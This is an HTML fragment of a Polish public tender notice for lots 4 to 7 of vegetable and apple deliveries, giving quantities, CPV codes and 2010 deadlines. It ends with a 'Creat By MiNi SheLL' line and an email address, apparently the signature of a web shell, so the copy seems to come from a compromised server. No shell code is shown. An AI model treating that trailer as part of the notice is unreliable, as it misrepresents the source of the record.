<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.12-4, 03.22.11.10-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część 4 - dostawy warzyw:
Buraki czerwone	(ćwikłowe)
Cebula biała świeża.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 4 - dostawy warzyw:
Buraki czerwone	(ćwikłowe)	6000 kg
Cebula biała świeża		2500 kg
Arkusz kalkulacyjny - załącznik nr 5 do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.11-7, 03.22.11.13-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część 5 - dostawy warzyw:
Seler świeży
Por świeży.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 5 -dostawy warzyw:
Seler świeży				2200 kg
Por świeży				1300 kg
Arkusz kalkulacyjny - załącznik nr 6 do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.10-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część 6 - dostawy kapusty:
Kapusta biała świeża.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 6 - dostawy kapusty:
Kapusta biała świeża			8000 kg
Arkusz kalkulacyjny - załącznik nr 7 do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.14.10-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Część 7 - dostawy jabłek (gatunek 1).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 7 - dostawy jabłek (gatunek 1)		5000 kg
Arkusz kalkulacyjny - załącznik nr 8 do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.23.21-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com